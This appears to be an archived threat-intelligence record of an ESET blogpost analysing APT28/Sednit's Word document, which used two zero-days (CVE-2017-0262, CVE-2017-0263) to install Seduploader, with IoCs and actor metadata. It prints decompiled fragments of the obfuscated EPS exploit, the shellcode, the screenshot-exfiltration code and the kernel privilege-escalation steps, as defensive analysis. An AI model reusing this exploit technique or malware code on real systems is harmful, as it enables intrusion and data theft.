{ "id": "33e400a2-0336-4975-a3d2-2ab3780e6fcd", "created_at": "2026-04-06T00:10:53.85122Z", "updated_at": "2026-04-10T03:37:50.629827Z", "deleted_at": null, "sha1_hash": "6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97", "title": "Sednit adds two zero-day exploits using 'Trump's attack on Syria' as a decoy", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 771920, "plain_text": "Sednit adds two zero-day exploits using 'Trump's attack on Syria' as a\r\ndecoy\r\nBy ESET Research\r\nArchived: 2026-04-05 19:21:22 UTC\r\nIntroduction\r\nThe Sednit group, also known as APT28, Fancy Bear and Sofacy, is a group of attackers operating since at least 2004 and\r\nwhose main objective is to steal confidential information from specific targets. In October 2016, ESET published an\r\nextensive analysis of Sednit’s arsenal and tactics in a whitepaper titled En Route with Sednit.\r\nLast month, Sednit came in the light again, allegedly interfering with the French elections and more precisely going after the\r\nfrontrunner Emmanuel Macron. In the same time period, a phishing email containing an attachment\r\nnamed Trump's_Attack_on_Syria_English.docx caught our attention.\r\nAnalysis of the document revealed its end goal: dropping Sednit’s well-known reconnaissance tool, Seduploader. To achieve\r\nthis, Sednit used two zero-day exploits: one for a Remote Code Execution vulnerability in Microsoft Word (CVE-2017-\r\n0262) and one for a Local Privilege Escalation in Windows (CVE-2017-0263). ESET reported both vulnerabilities to\r\nMicrosoft, who today released patches during the regular Patch Tuesday schedule.\r\nThis blogpost describes the attack itself and the vulnerabilities used to infect its potential targets.\r\nFrom a Word exploit to Seduploader Dropper\r\nThe graphic below shows that this specific attack is totally in line with Sednit’s usual attack methods: the use of a\r\nspearphishing email containing a malicious attachment to install a known first-stage payload.\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 1 of 16\n\nThis time, the phishing email was related to Trump’s attack on Syria.\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 2 of 16\n\nThe infected attachment is a decoy document containing a verbatim copy of an article titled “Trump’s Attack on Syria:\r\nWrong for so Many Reasons” published on April 12, 2017 in The California Courier:\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 3 of 16\n\nThis is where the attack becomes interesting. The decoy document contains two exploits allowing the installation of\r\nSeduploader. See the schema below for an overview.\r\nThese two exploits can be added to the list of zero-day vulnerabilities used by Sednit over the last 2 years, as shown in this\r\ntimeline:\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 4 of 16\n\nOnce opened, the decoy document first triggers CVE-2017-0262, a vulnerability in the EPS filter in Microsoft Office. In this\r\ncase, the malicious EPS file is called image1.eps within the .docx file:\r\n$ file Trump\\'s_Attack_on_Syria_English.docx\r\nTrump's_Attack_on_Syria_English.docx: Zip archive data, at least v2.0 to extrac2\r\n$ unzip Trump\\'s_Attack_on_Syria_English.docx\r\nArchive: Trump’s_Attack_on_Syria_English.docx\r\n inflating: [Content_Types].xml\r\n inflating: docProps/app.xml\r\n inflating: docProps/core.xml\r\n inflating: word/document.xml\r\n inflating: word/fontTable.xml\r\n inflating: word/settings.xml\r\n inflating: word/styles.xml\r\n inflating: word/webSettings.xml\r\n inflating: word/media/image1.eps\r\n inflating: word/theme/theme1.xml\r\n inflating: word/_rels/document.xml.rels\r\n inflating: _rels/.rels\r\n$ file word/media/image1.eps\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 5 of 16\n\nword/media/image1.eps: PostScript document text conforming DSC level 3.0\r\nThe EPS exploit file is obfuscated by a simple XOR. EPS provides the functionality to XOR variables and evaluate source\r\n(exec). The key used here is 0xc45d6491 on a big hex-encoded string and exec is called on the decrypted buffer.\r\n$ cat word/media/image1.eps\r\n%!PS-Adobe-3.0\r\n%%BoundingBox: 36 36 576 756\r\n%%Page: 1 1\r\n/A3{ token pop exch pop } def /A2 def /A4{ /A1 exch def 0 1 A1 length 1 sub { /A5 exch def A1 A5 2 copy get A2 A5 4 mod g\r\nOnce decrypted, the exploit looks very similar to the one which was well documented by FireEye in 2015. The vulnerability\r\nused at the time was CVE-2015-2545. The main difference is highlighted in the following block, which is how it performs\r\nthe memory corruption with the forall instruction.\r\n[...]\r\n500 {\r\n A31 589567 string copy pop\r\n} repeat\r\n1 array 226545696 forall\r\n/A19 exch def\r\n[...]\r\nOnce code execution is obtained, it loads a shellcode that retrieves some undocumented Windows APIs such as\r\nNtAllocateVirtualMemory, NtFreeVirtualMemory and ZwProtectVirtualMemory\r\n[...]\r\n v1 = (*(__readfsdword(0x30u) + 12) + 12);\r\n v2 = v1-\u0026gt;InLoadOrderModuleList.Flink;\r\n [...]\r\n for ( addr_user32 = 0; v2 != v1; v135 = v2 )\r\n {\r\n v3 = *(v2 + 48);\r\n v132 = *(v2 + 44);\r\n if ( v3 )\r\n {\r\n v4 = *v3;\r\n v5 = 0;\r\n v6 = 0;\r\n if ( *v3 )\r\n {\r\n do\r\n {\r\n if ( v132 \u0026amp;\u0026amp; v6 \u0026gt;= v132 )\r\n break;\r\n if ( (v4 - 0x41) \u0026lt;= 0x19u )\r\n v4 += 0x20;\r\n v2 = v135;\r\n v7 = __ROL4__(v5, 7);\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 6 of 16\n\n++v3;\r\n v5 = v4 ^ v7;\r\n v4 = *v3;\r\n ++v6;\r\n }\r\n while ( *v3 );\r\n v1 = v133;\r\n }\r\n switch ( v5 )\r\n {\r\n case kernel32:\r\n addr_kernel32 = *(v2 + 24);\r\n break;\r\n case ntdll:\r\n addr_ntdll = *(v2 + 24);\r\n break;\r\n case user32:\r\n addr_user32 = *(v2 + 24);\r\n break;\r\n }\r\n }\r\n[...]\r\nAfter more decryption, the Seduploader Dropper is then loaded and executed. Note that all this execution happens within\r\nthe WINWORD.EXE process running with the current user’s privileges.\r\nSeduploader Dropper\r\nSeduploader is made up of two distinct components: a dropper and a persistent payload (see page 27 of our En Route with\r\nSednit whitepaper).\r\nWhile the dropper used in this attack has evolved since the last version we analyzed, its end goal remains the same: to\r\ndeliver the Seduploader Payload. This new version of the dropper now contains code to integrate the LPE exploit for CVE-2017-2063. The detailed analysis of this vulnerability can be found in the next section of the blog; for now, we will focus on\r\nSeduploader.\r\nFirst, the new code in the dropper checks if the process is running on a 32-bit or 64-bit version of Windows. Depending of\r\nthe result, the correct exploit version will be loaded in memory.\r\n[...]\r\n if ( Is64Process() == 1 )\r\n {\r\n addr_exploit = exploit_64b;\r\n size_exploit = 0x2E00;\r\n }\r\n else\r\n {\r\n addr_exploit = exploit_32b;\r\n size_exploit = 0x2400;\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 7 of 16\n\n}\r\n[...]\r\nOnce the exploit is successfully executed, Seduploader Dropper will reload itself in WINWORD’s memory space and\r\ncall CreateRemoteThread with the address of the UpLoader entry point, which will execute the code in charge of installing\r\nthe Seduploader Payload. This code will run with System privileges, thanks to the exploit.\r\nSeduploader Payload\r\nSeduploader Payload is a downloader used by Sednit’s operators as reconnaissance malware and is composed of two parts.\r\nThe first is responsible for injecting the second part in the proper process, depending on whether it is loaded in\r\nthe WINWORD.EXE process or not. The second part is the downloader itself.\r\nIf Seduploader is running in WINWORD.EXE, its first part will create a mutex named flPGdvyhPykxGvhDOAZnU and\r\nopen a handle to the current process. That handle will be used to allocate memory and write in it the code of the second part\r\nof the Payload component, which will then be executed by a call to CreateRemoteThread. Otherwise, if it is not running in\r\nWINWORD.EXE, Seduploader will use CreateThread to launch its second part.\r\nThe downloader contains the usual Seduploader functions and strings encryption algorithm. However, it contains a certain\r\nnumber of changes that we describe below.\r\nFirst, the hashing algorithm used to identify DLL names and API functions to resolve was replaced by a new one. The\r\nattentive readers of our whitepaper will recall that the old hashing algorithm was strongly inspired from code found in\r\nCarberp. Well, the new algorithm was also not created from scratch: this time, Sednit used code very similar to PowerSniff.\r\nNext, a new img tag was added in Seduploader’s report message. This tag allows the exfiltration of screenshots:\r\n[...]\r\nkeybd_event(VK_SNAPSHOT, 0x45u, KEYEVENTF_EXTENDEDKEY, 0u);\r\nSleep(1000u);\r\nkeybd_event(VK_SNAPSHOT, 0x45u, KEYEVENTF_EXTENDEDKEY|KEYEVENTF_KEYUP, 0u);\r\nOpenClipboard(0u);\r\nhData = GetClipboardData(CF_BITMAP);\r\nCloseClipboard();\r\nif ( !hData )\r\n return 0;\r\nGdiplusStartupInput = (const int *)1;\r\nv10 = 0;\r\nv11 = 0;\r\nv12 = 0;\r\nGdiplusStartup(\u0026token, \u0026GdiplusStartupInput, 0);\r\nif ( fGetEncoderClsid((int)L\"image/jpeg\", \u0026imageCLSID) )\r\n{\r\n v4 = sub_10003C5F((int)hData, 0);\r\n ppstm = 0;\r\n CreateStreamOnHGlobal(0u, 1u, \u0026ppstm);\r\n v5 = GdipSaveImageToStream(v4[1], ppstm, \u0026imageCLSID, 0);\r\n if ( v5 )\r\n v4[2] = v5;\r\n (*(void (__thiscall **)(_DWORD *, signed int))*v4)(v4, 1);\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 8 of 16\n\nIStream_Size(ppstm, \u0026pui);\r\n cb = pui.s.LowPart;\r\n v7 = ppstm;\r\n *a1 = pui.s.LowPart;\r\n IStream_Reset(v7);\r\n v1 = j_HeapAlloc(cb);\r\n IStream_Read(ppstm, v1, cb);\r\n ppstm-\u003elpVtbl-\u003eRelease(ppstm);\r\n}\r\nGdiplusShutdown(token);\r\nreturn v1;\r\n}\r\nAs usual, Sednit operators did not reinvent the wheel. We found some similarities between their implementation of the\r\nscreenshot function and code available on stackoverflow. Instead of using GetForegroundWindow to retrieve a handle on the\r\nforeground window in which the user is currently working, Sednit chose to use keybd_event to send a “Print screen”\r\nkeystroke and then retrieve the image from the clipboard.\r\nThe image is then base64-encoded and added to the report, whose structure now looks like this:\r\nTag Value\r\nid= Hard drive serial number*\r\nw= Process list\r\nNone NICs information\r\ndisk= register key**\r\nbuild= 4 bytes\r\ninject optional field***\r\nimg= screenshot encoded in base64\r\n* result of “import win32api;print hex(win32api.GetVolumeInformation(\"C:\\\\\")[1])”\r\n** content of HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\r\n*** toggled if SEDUPLOADER uses injection into a browser to connect to Internet\r\nScreenshotting was used before by Sednit. In the past, the feature was built in a separate, standalone tool often invoked by\r\nXtunnel at a later infection stage (see page 77 of our whitepaper), but it is now built in Seduploader for use at the\r\nreconnaissance phase.\r\nFinally, on the config side, two new functions were added: shell and LoadLib. The shell config allows the attacker to execute\r\narbitrary code directly in-memory. The LoadLib is a bit field that allows running an arbitrary DLL by calling rundll32.exe\r\nCVE-2017-0263 - Local privilege escalation\r\nExploit Workflow\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 9 of 16\n\nAs mentioned before, in order to deploy Seduploader Payload, Seduploader Dropper gains System privileges by exploiting\r\nCVE-2017-0263, an LPE vulnerability. In this section, we will describe how this vulnerability is exploited by Sednit.\r\nFirst, even though the vulnerability affects Windows 7 and above (see at the end of this post for the full list of affected\r\nplatforms), the exploit is designed to avoid running on Windows version 8.1 and above.\r\nSince the exploit can target both 32-bit and 64-bit platforms, it will first determine if the process is running under WOW64.\r\nThe exploit will allocate multiple pages, until it reaches a high address (0x02010000). It will then build the following\r\nstructure:\r\nstruct Payload\r\n {\r\n LONG PTEAddress; // Points to the PTE entry containing the physical address of the page containing our st\r\n LONG pid; // Injected process pid;\r\n LONG offset_of_lpszMenuName; // Offset of the lpszMenuName in the win32k!tagCLS structure\r\n LONG offset_of_tagTHREADINFO; // Offset of the pti field in the win32k!tagWND structure.\r\n LONG offset_of_tagPROCESSINFO; // Offset of the ppi field in the win32k!tagTHREADINFO structure.\r\n LONG offset_of_TOKEN; // Offset of the Token field in the nt!_EPROCESS structure.\r\n LONG tagCLS[0x100]; // Array containing the tagCLS of the created windows.\r\n LONG WndProcCode; // Code of the WndProc meant to be run in kernel mode.\r\n };\r\nThen, it will retrieve the address of HMValidateHandle. This function allows the attacker to leak the kernel address of a\r\ntagWND object.\r\nHere is an overview of how the rest of the exploit works:\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 10 of 16\n\nThe exploit will create 256 random window classes and their associated windows. Each window will have 512 bytes of extra\r\nmemory. This extra memory is contiguous to the tagWND object in the kernel space. After the first created window, i.e. in\r\nthe extra memory, the exploit will build a fake object containing mostly only its own address for later use, as shown in the\r\npicture:\r\nWhen all the windows are created, the exploit will allocate 2 additional windows. The purpose of first one is to be executed\r\nin a kernel thread: let’s call this window KernelWnd, and the other one will mainly receive all the necessary messages\r\nneeded for the exploit to complete; let’s call this window TargetWindow. Then, the exploit associates this procedure with the\r\nnewly allocated object, KernelWnd.\r\n// ...\r\nTargetWindow = CreateWindowExW(0x80088u, MainWindowClass, 0, WS_VISIBLE, 0, 0, 1, 1, 0, 0, hModuleSelf, 0);\r\nKernelWnd = CreateWindowExW(0, MainWindowClass, 0, 0, 0, 0, 1, 1, 0, 0, hModuleSelf, 0);\r\n// ...\r\nSetWindowLongW(KernelWnd, GWL_WNDPROC, (LONG)Payload_0-\u003eWndProc);\r\nLet’s add some context around the behavior of the win32k component. Every time you create a new window through\r\nCreateWindowExW, the driver will allocate a new tagWND object in the kernel. The object can be described like this (some\r\nfields are removed for clarity’s sake):\r\nkd\u003e dt tagWND\r\n win32k!tagWND\r\n +0x000 head : _THRDESKHEAD\r\n +0x028 state : Uint4B\r\n // ...\r\n +0x028 bServerSideWindowProc : Pos 18, 1 Bit\r\n // ...\r\n +0x042 fnid : Uint2B\r\n +0x048 spwndNext : Ptr64 tagWND\r\n +0x050 spwndPrev : Ptr64 tagWND\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 11 of 16\n\n+0x058 spwndParent : Ptr64 tagWND\r\n +0x060 spwndChild : Ptr64 tagWND\r\n +0x068 spwndOwner : Ptr64 tagWND\r\n +0x070 rcWindow : tagRECT\r\n +0x080 rcClient : tagRECT\r\n +0x090 lpfnWndProc : Ptr64 int64\r\n +0x098 pcls : Ptr64 tagCLS\r\n // ...\r\nAs you can see, the tagWND-\u003elpfnWindowProc contains the address of the procedure associated with this window. The\r\ndriver usually lowers its privileges in order to execute this procedure in the user’s context. This behavior is controlled by the\r\nbit tagWND-\u003ebServerSideProc. If this bit is set, then the procedure will be run with elevated privileges, i.e in the kernel.\r\nThe exploit works by flipping the tagWND-\u003ebServerSideProc bit. All the attacker needs to do is to find a way of flipping\r\nthat bit.\r\nDuring the destruction of the menus, the hook set up before will check if the class of the object is SysShadow as shown on\r\nthe next code block. If that's the case, it will replace the associated procedure with its own.\r\n GetClassNameW(tagCWPSTRUCT-\u003ehwnd, \u0026ClassName, 20);\r\n if ( !wcscmp(\u0026ClassName, STR_SysShadow) )\r\n {\r\n if ( ++MenuIndex == 3 )\r\n {\r\n // tagWND\r\n ::wParam = *(_DWORD *)(FN_LeakHandle((int)hWnd[0]) + sizeof_tagWND_0);\r\n // Replace the WndProc of the object\r\n SetWindowLongW(tagCWPSTRUCT-\u003ehwnd, GWL_WNDPROC, (LONG)FN_TriggerExploit);\r\n }\r\nIn this procedure, we can see that the exploit looks for the WM_NCDESTROY message. If the requirements are met, it will\r\nbuild a malicious tagPOPUPMENU object which is described by the following pseudocode:\r\nif ( Msg == WM_NCDESTROY )\r\n {\r\n struct tagPOPUPMENU *pm = BuildFakeObject();\r\n SetClassLongW(..., pm);\r\n }\r\nNote that the address used to build this object is within the extra memory allocated at the end of our first tagWND. Then, the\r\nexploit calls NtUserMNDragLeave, in order to flip the bServerSideProc bit of our KernelWnd object. To do so, the function\r\nwill retrieve a tagMENUSTATE object using the structure tagTHREADINFO. The tagMENUSTATE object contains the\r\naddress of the menu object being destroyed (tagMENUSTATE-\u003epGlobalPopupMenu).\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 12 of 16\n\nAs you can see, the tagPOPUPMENU is the malicious object we crafted in user space before calling NtUserMNDragLeave.\r\nLooking at the fields in the malicious tagPOPUPMENU, we can see that they all points in the extra memory except one,\r\nwhich points into our KernelWnd object.\r\nFrom here, the execution will reach the function MNFreePopup, which takes a pointer to a tagPOPUPMENU object.\r\nEventually this function will call HMAssignmentUnlock, passing the fields spwndNextPopup and spwndPrevPopup as\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 13 of 16\n\nargument:\r\n; win32k!HMAssignmentUnlock\r\nrsp,28h\r\nmov rdx,qword ptr [rcx]\r\nand qword ptr [rcx],0\r\ntest rdx,rdx\r\nje win32k!HMAssignmentUnlock+0x4f (fffff960`00119adf)\r\nadd dword ptr [rdx+8],0FFFFFFFFh; Flipping bServerSideProc\r\njne win32k!HMAssignmentUnlock+0x4f (fffff960`00119adf)\r\nmovzx eax,word ptr [rdx]\r\nAfter the execution of the syscall, our tagWND structure associated with our KernelWnd looks like this:\r\nEverything is set! The exploit just needs to send the right message in order to trigger the execution of our procedure in\r\nkernel mode.\r\nsyscall(NtUserMNDragLeave, 0, 0);\r\n // Send a message to the procedure in order to trigger its execution in kernel mode.\r\n KernelCallbackResult = SendMessageW(KernelWnd, 0x9F9Fu, ::wParam, 0);\r\n Status.Triggered = KernelCallbackResult == 0x9F9F;\r\n if ( KernelCallbackResult != 0x9F9F )\r\n // Error, try again.\r\n PostMessageW(TargetWindow, 0xABCDu, 0, 0);\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 14 of 16\n\nFinally, the window procedure running with elevated privileges will steal the SYSTEM token and add it to the calling\r\nprocess. After successfully running the exploit, FLTLDR.EXE should run with SYSTEM privileges, and will install\r\nSeduploader’s payload\r\nSummary\r\nThis campaign shows us that Sednit has not ceased its activities. They still keep their old habits: using known attack\r\nmethods, reusing code from other malware or public websites, and making small mistakes such as typos in Seduploader’s\r\nconfiguration (shel instead of shell).\r\nAlso usual is the fact that they once again improved their toolset, this time adding some built-in features such as the\r\nscreenshotter and integrating two new zero-day exploits into their arsenal.\r\nPlatforms affected by CVE-2017-0262 and CVE-2017-0263 (according to Microsoft)\r\nCVE-2017-0262\r\nMicrosoft Office 2010 Service Pack 2 (32-bit editions)\r\nMicrosoft Office 2010 Service Pack 2 (64-bit editions)\r\nMicrosoft Office 2013 Service Pack 1 (32-bit editions)\r\nMicrosoft Office 2013 Service Pack 1 (64-bit editions)\r\nMicrosoft Office 2013 RT Service Pack 1\r\nMicrosoft Office 2016 (32-bit edition)\r\nMicrosoft Office 2016 (64-bit edition)\r\nMicrosoft advises all customers to follow the guidance in security advisory ADV170005 as a defense-in-depth measure\r\nagainst EPS filter vulnerabilities.\r\nCVE-2017-0263\r\nWindows 7 for 32-bit Systems Service Pack 1\r\nWindows 7 for x64-based Systems Service Pack 1\r\nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\r\nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1\r\nWindows Server 2008 R2 for x64-based Systems Service Pack 1\r\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\r\nWindows Server 2012\r\nWindows Server 2012 (Server Core installation)\r\nWindows 8.1 for 32-bit systems\r\nWindows 8.1 for x64-based systems\r\nWindows Server 2012 R2\r\nWindows RT 8.1\r\nWindows Server 2012 R2 (Server Core installation)\r\nWindows 10 for 32-bit Systems\r\nWindows 10 for x64-based Systems\r\nWindows 10 Version 1511 for x64-based Systems\r\nWindows 10 Version 1511 for 32-bit Systems\r\nWindows Server 2016\r\nWindows 10 Version 1607 for 32-bit Systems\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 15 of 16\n\nWindows 10 Version 1607 for x64-based Systems\r\nWindows Server 2016 (Server Core installation)\r\nWindows 10 Version 1703 for 32-bit Systems\r\nWindows 10 Version 1703 for x64-based Systems\r\nWindows Server 2008 for Itanium-Based Systems Service Pack 2\r\nWindows Server 2008 for 32-bit Systems Service Pack 2\r\nWindows Server 2008 for x64-based Systems Service Pack 2\u003c\r\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\r\nIoCs\r\nAlso available on ESET's Github.\r\nSHA-1 Filename ESET detection name\r\nd5235d136cfcadbef431eea7253d80bde414db9d Trump's_Attack_on_Syria_English.docx Win32/Exploit.Agent.NWZ\r\n18b7dd3917231d7bae93c11f915e9702aa5d1bbb image1.eps Win32/Exploit.Agent.NWZ\r\n6a90e0b5ec9970a9f443a7d52eee4c16f17fcc70 joiner.dll Win32/Exploit.Agent.NWV\r\ne338d49c270baf64363879e5eecb8fa6bdde8ad9 apisecconnect.dll Win32/Sednit.BG\r\nMutex\r\nflPGdvyhPykxGvhDOAZnU\r\nRegistry key\r\nHKCU\\Software\\Microsoft\\Office test\\Special\\Perf\r\nSource: https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/" ], "report_names": [ "sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434253, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97.pdf", "text": "https://archive.orkl.eu/6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97.txt", "img": "https://archive.orkl.eu/6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97.jpg" } }